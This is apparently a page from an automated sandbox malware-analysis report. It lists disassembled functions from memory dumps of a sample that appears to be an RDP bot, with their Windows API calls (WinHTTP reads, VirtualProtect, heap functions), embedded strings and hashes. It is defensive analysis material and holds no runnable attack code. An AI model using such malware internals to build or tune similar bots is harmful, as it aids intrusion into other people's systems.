Associated: 00000014.00000002.2559924904.00007FFE11500000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2559965341.00007FFE11513000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2559980508.00007FFE11514000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2559997129.00007FFE1151D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2560013124.00007FFE11520000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2560027784.00007FFE11521000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2560045093.00007FFE11524000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffe11500000_main.jbxd

Similarity

API ID: CriticalHeapSection$EnterFreeLeaveProcessfflushfwrite
String ID: [D] (%s) -> Requested(handler=0x%p)$[E] (%s) -> Failed(handler=0x%p)$[I] (%s) -> Done(handler=0x%p)$ebus_unsubscribe
API String ID: 2011334650-1527096901
Opcode ID: 66a3f05f77845ceec4428f1e402f2588408590e07ecc7afb8576188049664c55
Instruction ID: 77c20318b7fae06b4b482b9961853383eea561d582263ea0a29f9862187c63cf
Opcode Fuzzy Hash: 66a3f05f77845ceec4428f1e402f2588408590e07ecc7afb8576188049664c55
Instruction Fuzzy Hash: 92213161A0AE0794FF12AB97E84417C63ADAF44BB0F4845BDD91E473B8EE6CE845C301

Function 00007FFE0EB4F307 Relevance: 12.1, APIs: 4, Strings: 4, Instructions: 63memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FFE0EB41292: fwrite.MSVCRT ref: 00007FFE0EB4133E
Part of subcall function 00007FFE0EB41292: fflush.MSVCRT ref: 00007FFE0EB4134A

EnterCriticalSection.KERNEL32 ref: 00007FFE0EB4F33F
GetProcessHeap.KERNEL32 ref: 00007FFE0EB4F39B
HeapFree.KERNEL32 ref: 00007FFE0EB4F3AC
LeaveCriticalSection.KERNEL32 ref: 00007FFE0EB4F3CF

Strings

[I] (%s) -> Done(handler=0x%p), xrefs: 00007FFE0EB4F3BC
[D] (%s) -> Requested(handler=0x%p), xrefs: 00007FFE0EB4F31A
ebus_unsubscribe, xrefs: 00007FFE0EB4F313, 00007FFE0EB4F3B5, 00007FFE0EB4F3EC
[E] (%s) -> Failed(handler=0x%p), xrefs: 00007FFE0EB4F3F3

Memory Dump Source

Source File: 00000014.00000002.2559615479.00007FFE0EB41000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFE0EB40000, based on PE: true

Associated: 00000014.00000002.2559600601.00007FFE0EB40000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2559637544.00007FFE0EB56000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2559653233.00007FFE0EB60000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2559668361.00007FFE0EB63000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2559683911.00007FFE0EB64000.00000008.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffe0eb40000_main.jbxd

Similarity

API ID: CriticalHeapSection$EnterFreeLeaveProcessfflushfwrite
String ID: [D] (%s) -> Requested(handler=0x%p)$[E] (%s) -> Failed(handler=0x%p)$[I] (%s) -> Done(handler=0x%p)$ebus_unsubscribe
API String ID: 2011334650-1527096901
Opcode ID: 49b1fd760a10f2870a0ec3ca0901205ba1fa7ca952bd0aef191dbdd6cb4fa325
Instruction ID: 300fb7353b603a8770afbd059144baf5420ffc08461a7efa619d9810ddc22410
Opcode Fuzzy Hash: 49b1fd760a10f2870a0ec3ca0901205ba1fa7ca952bd0aef191dbdd6cb4fa325
Instruction Fuzzy Hash: D8213DA1F0EB0791FE716F56E99017823A0EF48B84F08A435C9CD477B4EE6CE4858B01

Function 00007FFE1150BA02 Relevance: 12.1, APIs: 8, Instructions: 59memoryCOMMON

Download Yara Rule

APIs

WinHttpQueryDataAvailable.WINHTTP ref: 00007FFE1150BBDA
WinHttpReadData.WINHTTP ref: 00007FFE1150BC1D
GetProcessHeap.KERNEL32 ref: 00007FFE1150BC4B
HeapAlloc.KERNEL32 ref: 00007FFE1150BC5C
memcpy.MSVCRT ref: 00007FFE1150BC7C
memcpy.MSVCRT ref: 00007FFE1150BC95
GetProcessHeap.KERNEL32 ref: 00007FFE1150BCA9
HeapFree.KERNEL32 ref: 00007FFE1150BCBA
GetProcessHeap.KERNEL32 ref: 00007FFE1150BCF8
HeapFree.KERNEL32 ref: 00007FFE1150BD09
GetProcessHeap.KERNEL32 ref: 00007FFE1150BD1C
HeapFree.KERNEL32 ref: 00007FFE1150BD2D
GetProcessHeap.KERNEL32 ref: 00007FFE1150BD40
HeapFree.KERNEL32 ref: 00007FFE1150BD51
GetProcessHeap.KERNEL32 ref: 00007FFE1150BD61
HeapFree.KERNEL32 ref: 00007FFE1150BD72
WinHttpCloseHandle.WINHTTP ref: 00007FFE1150BD80

Memory Dump Source

Source File: 00000014.00000002.2559943687.00007FFE11501000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE11500000, based on PE: true

Associated: 00000014.00000002.2559924904.00007FFE11500000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2559965341.00007FFE11513000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2559980508.00007FFE11514000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2559997129.00007FFE1151D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2560013124.00007FFE11520000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2560027784.00007FFE11521000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2560045093.00007FFE11524000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffe11500000_main.jbxd

Similarity

API ID: Heap$Process$Free$Http$Datamemcpy$AllocAvailableCloseHandleQueryRead
String ID:
API String ID: 425989387-0
Opcode ID: 1bcfc37f0bfaacb8f6733524e2454e0d51d20cc4fde7ffeff2630841b9116760
Instruction ID: 07085e79bf24454f7a713d60d2c87b5743a9d2102e1bb07336a270110f50b74d
Opcode Fuzzy Hash: 1bcfc37f0bfaacb8f6733524e2454e0d51d20cc4fde7ffeff2630841b9116760
Instruction Fuzzy Hash: 41218E25B19E9286FBB09FA794807BE6399EF45B90F404078CD4D03B79DE7CE4088B01

Function 00007FFE1150BA0C Relevance: 12.1, APIs: 8, Instructions: 59memoryCOMMON

Download Yara Rule

APIs

WinHttpQueryDataAvailable.WINHTTP ref: 00007FFE1150BBDA
WinHttpReadData.WINHTTP ref: 00007FFE1150BC1D
GetProcessHeap.KERNEL32 ref: 00007FFE1150BC4B
HeapAlloc.KERNEL32 ref: 00007FFE1150BC5C
memcpy.MSVCRT ref: 00007FFE1150BC7C
memcpy.MSVCRT ref: 00007FFE1150BC95
GetProcessHeap.KERNEL32 ref: 00007FFE1150BCA9
HeapFree.KERNEL32 ref: 00007FFE1150BCBA
GetProcessHeap.KERNEL32 ref: 00007FFE1150BCF8
HeapFree.KERNEL32 ref: 00007FFE1150BD09
GetProcessHeap.KERNEL32 ref: 00007FFE1150BD1C
HeapFree.KERNEL32 ref: 00007FFE1150BD2D
GetProcessHeap.KERNEL32 ref: 00007FFE1150BD40
HeapFree.KERNEL32 ref: 00007FFE1150BD51
GetProcessHeap.KERNEL32 ref: 00007FFE1150BD61
HeapFree.KERNEL32 ref: 00007FFE1150BD72
WinHttpCloseHandle.WINHTTP ref: 00007FFE1150BD80

Memory Dump Source

Source File: 00000014.00000002.2559943687.00007FFE11501000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE11500000, based on PE: true

Associated: 00000014.00000002.2559924904.00007FFE11500000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2559965341.00007FFE11513000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2559980508.00007FFE11514000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2559997129.00007FFE1151D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2560013124.00007FFE11520000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2560027784.00007FFE11521000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2560045093.00007FFE11524000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffe11500000_main.jbxd

Similarity

API ID: Heap$Process$Free$Http$Datamemcpy$AllocAvailableCloseHandleQueryRead
String ID:
API String ID: 425989387-0
Opcode ID: 9340a8f84cef95cb0799962af248f98c38f0e91bf0fd52a4033b57ad76dfc640
Instruction ID: 15fa7c26fad84f45c3c62a04697b34d12fc1c1562d6855751f06cad6b83275b7
Opcode Fuzzy Hash: 9340a8f84cef95cb0799962af248f98c38f0e91bf0fd52a4033b57ad76dfc640
Instruction Fuzzy Hash: 79218E25B19E9286FBB09FA794807BE6399EF45B90F404078CD4D43B79DE7CE4088B01

Function 00007FFE1150B9F8 Relevance: 12.1, APIs: 8, Instructions: 59memoryCOMMON

Download Yara Rule

APIs

WinHttpQueryDataAvailable.WINHTTP ref: 00007FFE1150BBDA
WinHttpReadData.WINHTTP ref: 00007FFE1150BC1D
GetProcessHeap.KERNEL32 ref: 00007FFE1150BC4B
HeapAlloc.KERNEL32 ref: 00007FFE1150BC5C
memcpy.MSVCRT ref: 00007FFE1150BC7C
memcpy.MSVCRT ref: 00007FFE1150BC95
GetProcessHeap.KERNEL32 ref: 00007FFE1150BCA9
HeapFree.KERNEL32 ref: 00007FFE1150BCBA
GetProcessHeap.KERNEL32 ref: 00007FFE1150BCF8
HeapFree.KERNEL32 ref: 00007FFE1150BD09
GetProcessHeap.KERNEL32 ref: 00007FFE1150BD1C
HeapFree.KERNEL32 ref: 00007FFE1150BD2D
GetProcessHeap.KERNEL32 ref: 00007FFE1150BD40
HeapFree.KERNEL32 ref: 00007FFE1150BD51
GetProcessHeap.KERNEL32 ref: 00007FFE1150BD61
HeapFree.KERNEL32 ref: 00007FFE1150BD72
WinHttpCloseHandle.WINHTTP ref: 00007FFE1150BD80

Memory Dump Source

Source File: 00000014.00000002.2559943687.00007FFE11501000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE11500000, based on PE: true

Associated: 00000014.00000002.2559924904.00007FFE11500000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2559965341.00007FFE11513000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2559980508.00007FFE11514000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2559997129.00007FFE1151D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2560013124.00007FFE11520000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2560027784.00007FFE11521000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2560045093.00007FFE11524000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffe11500000_main.jbxd

Similarity

API ID: Heap$Process$Free$Http$Datamemcpy$AllocAvailableCloseHandleQueryRead
String ID:
API String ID: 425989387-0
Opcode ID: 8fd75a98aceab522790a96e644b721891c5ec7e36c19259a96f8de67cc1fb93f
Instruction ID: 4d5ca3f23a66fa9546efd7f49c57e323a2c777323c6adc96ba3f6dfe32290c0a
Opcode Fuzzy Hash: 8fd75a98aceab522790a96e644b721891c5ec7e36c19259a96f8de67cc1fb93f
Instruction Fuzzy Hash: 93218E29B19E9286FBB09FA794807BE6399EF45B90F404078CD4D03B79DE7CE4088B01

Function 00007FFE1150BAE4 Relevance: 12.1, APIs: 8, Instructions: 59memoryCOMMON

Download Yara Rule

APIs

WinHttpQueryDataAvailable.WINHTTP ref: 00007FFE1150BBDA
WinHttpReadData.WINHTTP ref: 00007FFE1150BC1D
GetProcessHeap.KERNEL32 ref: 00007FFE1150BC4B
HeapAlloc.KERNEL32 ref: 00007FFE1150BC5C
memcpy.MSVCRT ref: 00007FFE1150BC7C
memcpy.MSVCRT ref: 00007FFE1150BC95
GetProcessHeap.KERNEL32 ref: 00007FFE1150BCA9
HeapFree.KERNEL32 ref: 00007FFE1150BCBA
GetProcessHeap.KERNEL32 ref: 00007FFE1150BCF8
HeapFree.KERNEL32 ref: 00007FFE1150BD09
GetProcessHeap.KERNEL32 ref: 00007FFE1150BD1C
HeapFree.KERNEL32 ref: 00007FFE1150BD2D
GetProcessHeap.KERNEL32 ref: 00007FFE1150BD40
HeapFree.KERNEL32 ref: 00007FFE1150BD51
GetProcessHeap.KERNEL32 ref: 00007FFE1150BD61
HeapFree.KERNEL32 ref: 00007FFE1150BD72
WinHttpCloseHandle.WINHTTP ref: 00007FFE1150BD80

Memory Dump Source

Source File: 00000014.00000002.2559943687.00007FFE11501000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE11500000, based on PE: true

Associated: 00000014.00000002.2559924904.00007FFE11500000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2559965341.00007FFE11513000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2559980508.00007FFE11514000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2559997129.00007FFE1151D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2560013124.00007FFE11520000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2560027784.00007FFE11521000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2560045093.00007FFE11524000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffe11500000_main.jbxd

Similarity

API ID: Heap$Process$Free$Http$Datamemcpy$AllocAvailableCloseHandleQueryRead
String ID:
API String ID: 425989387-0
Opcode ID: 9340a8f84cef95cb0799962af248f98c38f0e91bf0fd52a4033b57ad76dfc640
Instruction ID: 15fa7c26fad84f45c3c62a04697b34d12fc1c1562d6855751f06cad6b83275b7
Opcode Fuzzy Hash: 9340a8f84cef95cb0799962af248f98c38f0e91bf0fd52a4033b57ad76dfc640
Instruction Fuzzy Hash: 79218E25B19E9286FBB09FA794807BE6399EF45B90F404078CD4D43B79DE7CE4088B01

Function 00007FFE1150BAF8 Relevance: 12.1, APIs: 8, Instructions: 59memoryCOMMON

Download Yara Rule

APIs

WinHttpQueryDataAvailable.WINHTTP ref: 00007FFE1150BBDA
WinHttpReadData.WINHTTP ref: 00007FFE1150BC1D
GetProcessHeap.KERNEL32 ref: 00007FFE1150BC4B
HeapAlloc.KERNEL32 ref: 00007FFE1150BC5C
memcpy.MSVCRT ref: 00007FFE1150BC7C
memcpy.MSVCRT ref: 00007FFE1150BC95
GetProcessHeap.KERNEL32 ref: 00007FFE1150BCA9
HeapFree.KERNEL32 ref: 00007FFE1150BCBA
GetProcessHeap.KERNEL32 ref: 00007FFE1150BCF8
HeapFree.KERNEL32 ref: 00007FFE1150BD09
GetProcessHeap.KERNEL32 ref: 00007FFE1150BD1C
HeapFree.KERNEL32 ref: 00007FFE1150BD2D
GetProcessHeap.KERNEL32 ref: 00007FFE1150BD40
HeapFree.KERNEL32 ref: 00007FFE1150BD51
GetProcessHeap.KERNEL32 ref: 00007FFE1150BD61
HeapFree.KERNEL32 ref: 00007FFE1150BD72
WinHttpCloseHandle.WINHTTP ref: 00007FFE1150BD80

Memory Dump Source

Source File: 00000014.00000002.2559943687.00007FFE11501000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE11500000, based on PE: true

Associated: 00000014.00000002.2559924904.00007FFE11500000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2559965341.00007FFE11513000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2559980508.00007FFE11514000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2559997129.00007FFE1151D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2560013124.00007FFE11520000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2560027784.00007FFE11521000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2560045093.00007FFE11524000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffe11500000_main.jbxd

Similarity

API ID: Heap$Process$Free$Http$Datamemcpy$AllocAvailableCloseHandleQueryRead
String ID:
API String ID: 425989387-0
Opcode ID: b7bf14e9f57a41d237414f1780024f26c93874e31421226ccd5b17d666592d17
Instruction ID: f70b74c4e9d29863eee52f7c69cfd3aea273a60b30f3512b32e10aaa6dacc12e
Opcode Fuzzy Hash: b7bf14e9f57a41d237414f1780024f26c93874e31421226ccd5b17d666592d17
Instruction Fuzzy Hash: 9A218E25B19E9286FBB09FA794807BE6399EF45B90F404078CD4D03B79DE7CE4088B01

Function 00007FFE1150BAD0 Relevance: 12.1, APIs: 8, Instructions: 59memoryCOMMON

Download Yara Rule

APIs

WinHttpQueryDataAvailable.WINHTTP ref: 00007FFE1150BBDA
WinHttpReadData.WINHTTP ref: 00007FFE1150BC1D
GetProcessHeap.KERNEL32 ref: 00007FFE1150BC4B
HeapAlloc.KERNEL32 ref: 00007FFE1150BC5C
memcpy.MSVCRT ref: 00007FFE1150BC7C
memcpy.MSVCRT ref: 00007FFE1150BC95
GetProcessHeap.KERNEL32 ref: 00007FFE1150BCA9
HeapFree.KERNEL32 ref: 00007FFE1150BCBA
GetProcessHeap.KERNEL32 ref: 00007FFE1150BCF8
HeapFree.KERNEL32 ref: 00007FFE1150BD09
GetProcessHeap.KERNEL32 ref: 00007FFE1150BD1C
HeapFree.KERNEL32 ref: 00007FFE1150BD2D
GetProcessHeap.KERNEL32 ref: 00007FFE1150BD40
HeapFree.KERNEL32 ref: 00007FFE1150BD51
GetProcessHeap.KERNEL32 ref: 00007FFE1150BD61
HeapFree.KERNEL32 ref: 00007FFE1150BD72
WinHttpCloseHandle.WINHTTP ref: 00007FFE1150BD80

Memory Dump Source

Source File: 00000014.00000002.2559943687.00007FFE11501000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE11500000, based on PE: true

Associated: 00000014.00000002.2559924904.00007FFE11500000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2559965341.00007FFE11513000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2559980508.00007FFE11514000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2559997129.00007FFE1151D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2560013124.00007FFE11520000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2560027784.00007FFE11521000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2560045093.00007FFE11524000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffe11500000_main.jbxd

Similarity

API ID: Heap$Process$Free$Http$Datamemcpy$AllocAvailableCloseHandleQueryRead
String ID:
API String ID: 425989387-0
Opcode ID: 8fd75a98aceab522790a96e644b721891c5ec7e36c19259a96f8de67cc1fb93f
Instruction ID: 4d5ca3f23a66fa9546efd7f49c57e323a2c777323c6adc96ba3f6dfe32290c0a
Opcode Fuzzy Hash: 8fd75a98aceab522790a96e644b721891c5ec7e36c19259a96f8de67cc1fb93f
Instruction Fuzzy Hash: 93218E29B19E9286FBB09FA794807BE6399EF45B90F404078CD4D03B79DE7CE4088B01

Function 00007FFE1150BADA Relevance: 12.1, APIs: 8, Instructions: 59memoryCOMMON

Download Yara Rule

APIs

WinHttpQueryDataAvailable.WINHTTP ref: 00007FFE1150BBDA
WinHttpReadData.WINHTTP ref: 00007FFE1150BC1D
GetProcessHeap.KERNEL32 ref: 00007FFE1150BC4B
HeapAlloc.KERNEL32 ref: 00007FFE1150BC5C
memcpy.MSVCRT ref: 00007FFE1150BC7C
memcpy.MSVCRT ref: 00007FFE1150BC95
GetProcessHeap.KERNEL32 ref: 00007FFE1150BCA9
HeapFree.KERNEL32 ref: 00007FFE1150BCBA
GetProcessHeap.KERNEL32 ref: 00007FFE1150BCF8
HeapFree.KERNEL32 ref: 00007FFE1150BD09
GetProcessHeap.KERNEL32 ref: 00007FFE1150BD1C
HeapFree.KERNEL32 ref: 00007FFE1150BD2D
GetProcessHeap.KERNEL32 ref: 00007FFE1150BD40
HeapFree.KERNEL32 ref: 00007FFE1150BD51
GetProcessHeap.KERNEL32 ref: 00007FFE1150BD61
HeapFree.KERNEL32 ref: 00007FFE1150BD72
WinHttpCloseHandle.WINHTTP ref: 00007FFE1150BD80

Memory Dump Source

Source File: 00000014.00000002.2559943687.00007FFE11501000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE11500000, based on PE: true

Associated: 00000014.00000002.2559924904.00007FFE11500000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2559965341.00007FFE11513000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2559980508.00007FFE11514000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2559997129.00007FFE1151D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2560013124.00007FFE11520000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2560027784.00007FFE11521000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2560045093.00007FFE11524000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffe11500000_main.jbxd

Similarity

API ID: Heap$Process$Free$Http$Datamemcpy$AllocAvailableCloseHandleQueryRead
String ID:
API String ID: 425989387-0
Opcode ID: 1bcfc37f0bfaacb8f6733524e2454e0d51d20cc4fde7ffeff2630841b9116760
Instruction ID: 07085e79bf24454f7a713d60d2c87b5743a9d2102e1bb07336a270110f50b74d
Opcode Fuzzy Hash: 1bcfc37f0bfaacb8f6733524e2454e0d51d20cc4fde7ffeff2630841b9116760
Instruction Fuzzy Hash: 41218E25B19E9286FBB09FA794807BE6399EF45B90F404078CD4D03B79DE7CE4088B01

Function 00007FFE11508684 Relevance: 12.1, APIs: 4, Strings: 4, Instructions: 57stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 00007FFE115086FD
strlen.MSVCRT ref: 00007FFE11508719
strcat.MSVCRT ref: 00007FFE11508728
strlen.MSVCRT ref: 00007FFE11508733

Strings

(file_path != NULL), xrefs: 00007FFE115086D9
H:/Projects/rdp/bot/codebase/fs.c, xrefs: 00007FFE115086D2
fs_module_file, xrefs: 00007FFE115086E0
[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FFE115086E7

Memory Dump Source

Source File: 00000014.00000002.2559943687.00007FFE11501000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE11500000, based on PE: true

Associated: 00000014.00000002.2559924904.00007FFE11500000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2559965341.00007FFE11513000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2559980508.00007FFE11514000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2559997129.00007FFE1151D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2560013124.00007FFE11520000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2560027784.00007FFE11521000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2560045093.00007FFE11524000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffe11500000_main.jbxd

Similarity

API ID: strlen$strcat
String ID: (file_path != NULL)$H:/Projects/rdp/bot/codebase/fs.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$fs_module_file
API String ID: 2335785903-657390819
Opcode ID: 0fd57004b371df1984a92abffd1b094a4eb68b8aa7461c929641d995ba0cbeb6
Instruction ID: b68b41c2cf5e4420632116f6ec2b193294cc78993ae98c13acb6987845e16768
Opcode Fuzzy Hash: 0fd57004b371df1984a92abffd1b094a4eb68b8aa7461c929641d995ba0cbeb6
Instruction Fuzzy Hash: FE11D0A1E08E4784FB125F67AD00BBD669A5F21BE8F4C80B0DE4D0A3B6DE2CE4518340

Function 00007FFE133060C4 Relevance: 12.1, APIs: 4, Strings: 4, Instructions: 57stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 00007FFE1330613D
strlen.MSVCRT ref: 00007FFE13306159
strcat.MSVCRT ref: 00007FFE13306168
strlen.MSVCRT ref: 00007FFE13306173

Strings

fs_module_file, xrefs: 00007FFE13306120
(file_path != NULL), xrefs: 00007FFE13306119
[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FFE13306127
H:/Projects/rdp/bot/codebase/fs.c, xrefs: 00007FFE13306112

Memory Dump Source

Source File: 00000014.00000002.2560074476.00007FFE13301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE13300000, based on PE: true

Associated: 00000014.00000002.2560059627.00007FFE13300000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2560096145.00007FFE13310000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2560114963.00007FFE13318000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2560131841.00007FFE1331B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2560148324.00007FFE1331C000.00000008.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffe13300000_main.jbxd

Similarity

API ID: strlen$strcat
String ID: (file_path != NULL)$H:/Projects/rdp/bot/codebase/fs.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$fs_module_file
API String ID: 2335785903-657390819
Opcode ID: ae4effbd7a291b0ed4bc95fb94177f23ec76591f18c63d0d9a1729a6dee433f2
Instruction ID: a805137eb5df3b7c06b20c9ef4dbdb42d5f4991b781b5518c05da595620aa120
Opcode Fuzzy Hash: ae4effbd7a291b0ed4bc95fb94177f23ec76591f18c63d0d9a1729a6dee433f2
Instruction Fuzzy Hash: 5711B461A0CE838CFA159B1799147BD56519F317B4F5C40B0DE6D2B2ABDE3D94109308

Function 00007FFE1150E4F4 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 91memoryCOMMON

Download Yara Rule

APIs

VirtualQuery.KERNEL32 ref: 00007FFE1150E59D
VirtualProtect.KERNEL32 ref: 00007FFE1150E604
GetLastError.KERNEL32 ref: 00007FFE1150E60E

Strings

VirtualProtect failed with code 0x%x, xrefs: 00007FFE1150E4F9, 00007FFE1150E614
Address %p has no image-section, xrefs: 00007FFE1150E555
VirtualQuery failed for %d bytes at address %p, xrefs: 00007FFE1150E5B2

Memory Dump Source

Source File: 00000014.00000002.2559943687.00007FFE11501000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE11500000, based on PE: true

Associated: 00000014.00000002.2559924904.00007FFE11500000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2559965341.00007FFE11513000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2559980508.00007FFE11514000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2559997129.00007FFE1151D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2560013124.00007FFE11520000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2560027784.00007FFE11521000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2560045093.00007FFE11524000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffe11500000_main.jbxd

Similarity

API ID: Virtual$ErrorLastProtectQuery
String ID: VirtualProtect failed with code 0x%x$ VirtualQuery failed for %d bytes at address %p$Address %p has no image-section
API String ID: 637304234-2123141913
Opcode ID: eeb0f8908b565efe05f1034d9ca574a31fc389ee18094d8b7d6ed2ddd800573e
Instruction ID: a171d5b9c5cd52b808e1e85158dcb3d425c17dfe41316bb7c734173eb9b40b55
Opcode Fuzzy Hash: eeb0f8908b565efe05f1034d9ca574a31fc389ee18094d8b7d6ed2ddd800573e
Instruction Fuzzy Hash: 0531BF32B0AE1285EB109F53E84416C27AAEF85BA4F5885B9DD0D473B4EE3CE441C300

Function 00007FFE1330A9A4 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 91memoryCOMMON

Download Yara Rule

APIs

VirtualQuery.KERNEL32 ref: 00007FFE1330AA4D
VirtualProtect.KERNEL32 ref: 00007FFE1330AAB4
GetLastError.KERNEL32 ref: 00007FFE1330AABE

Strings

VirtualProtect failed with code 0x%x, xrefs: 00007FFE1330A9A9, 00007FFE1330AAC4
Address %p has no image-section, xrefs: 00007FFE1330AA05
VirtualQuery failed for %d bytes at address %p, xrefs: 00007FFE1330AA62

Memory Dump Source

